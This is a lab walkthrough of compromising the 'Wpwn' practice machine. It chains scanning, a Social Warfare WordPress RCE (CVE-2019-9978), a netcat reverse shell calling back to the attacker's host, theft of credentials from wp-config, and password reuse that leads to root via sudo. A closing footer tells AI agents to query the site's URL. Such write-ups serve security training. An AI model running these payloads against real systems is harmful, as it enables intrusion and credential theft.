# Wpwn

## Nmap

```
sudo nmap   192.168.178.123 -p- -sS -sV          

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

Running `curl` on port 80 simply shows a basic greeting for the machine by the creator.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-6d409c4ea29c5db88db363f126a052138588e817%2Fimage.png?alt=media)

With nothing else interesting we move onto directory enumeration with `dirsearch.py`.

```
sudo python3 dirsearch.py -u http://192.168.178.123/ -w /usr/share/seclists/Discovery/Web-Content/common.txt --full-url -t 75
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-d9b2de0b383f89d6b18675734c1fac8bad5611f3%2Fimage.png?alt=media)

With the common.txt wordlists we hit robots.txt and /wordpress. Robots contains no interesting information.

Moving over to the /wordpress directory we get the following page.

![/wordpress](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-1f41338cf623f9327592353bd0cc8d6d92c5a895%2Fimage.png?alt=media)

Other than this the Wordpress site contains no interesting information. From here we can run `WPScan` in order to try and identify further information.

```
wpscan --url http://192.168.178.123/wordpress/ --passwords /usr/share/wordlists/rockyou.txt   
```

`WPScan` picks up the plugin 'social-warfare' as being installed and out of date.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-2c301cc3e90b23bae472b739388e40f35867b2aa%2Fimage.png?alt=media)

Checking this against `searchsploit` reveals a RCE against the running version.

```
searchsploit -w social warfare 3.5.2
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-6e6b5e337d08e7243b7d2fa0e9e1b7c20d5c2110%2Fimage.png?alt=media)

The vulnerability has been assigned CVE-2019-9978.

Description:

The social-warfare plugin before 3.5.3 for WordPress has stored XSS via the wp-admin/admin-post.php?swp\_debug=load\_options swp\_url parameter, as exploited in the wild in March 2019. This affects Social Warfare and Social Warfare Pro.

The following GitHub shows a PoC for this exploit.

{% embed url="<https://github.com/hash3liZer/CVE-2019-9978>" %}

As per the GitHub description we need to create a text file that will be hosted on our attacking machine with the contents of what we want to execute.

```
<pre>system('command')</pre>
```

First I hosted a `Python SimpleHTTPServer` on my attacking machine.

```
sudo python2 -m SimpleHTTPServer 443
```

I then downloaded the associated Python script and executed as per below.

```
python2 cve-2019-9978.py  --target http://192.168.178.123/wordpress/ --payload-uri http://192.168.49.178:443/test.txt
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-e82b2bb42b9f3dc88cc1dd7a7b0e0de2593c4df3%2Fimage.png?alt=media)

In the example above the command included for test.txt was `'id'`. From here I replaced the command with `'which nc'` to see if `netcat` is on the target machine and then run the exploit again.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-8fd628de7038b0c4e9ab9861d1b1c453d2978577%2Fimage.png?alt=media)

As `netcat` is installed we can replace the command in the test.txt file with that of a `netcat` reverse shell.

Contents of test.txt:

```
<pre>system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.49.178 80 >/tmp/f')</pre>
```

I then set a `netcat` listener on my attacking machine:

```
sudo nc -lvp 80
```

Running the exploit again hangs the script as we receive a reverse shell.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-33cb53f3c4dd570d0e8ec8f01c99da5485f45a2a%2Fimage.png?alt=media)

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-4a182807b8577edf9c8b3c38fecd22821b564032%2Fimage.png?alt=media)

We then upgrade the shell:

```
/usr/bin/script -qc /bin/bash /dev/null
```

Moving back one directory in the shell we can then read the contents of wp-config for any `MySQL` database credentials.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-aaba7fa2c5c4733d8b3eb34686314637dee704d6%2Fimage.png?alt=media)

We have gathered the credentials: `wp_user:R3&]vzhHmMn9,:-5` From here I logged into `MySQL` and took the Wordpress administrator's hash. I was however, unable to crack. Looking on the box we have the user 'takis' I decided to see if password reuse was in play and `SSH` in as takis.

```
ssh takis@192.168.178.123
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-f91ac480f037e15413d1172dd305ce859f2a3167%2Fimage.png?alt=media)

Now we are in as takis I then run `sudo -l` to check `sudo` permissions.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-e17cb5bb478b86d9c773b6630f6b7dcba91b3c4c%2Fimage.png?alt=media)

Looks like we can run all commands as any users without a password. A simple `sudo /bin/bash` will spawn us a root shell.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-059d5ad64121ad0feadaf62e480829722054fe71%2Fimage.png?alt=media)


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://viperone.gitbook.io/pentest-everything/writeups/pg-play-or-vulnhub/linux/wpwn.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.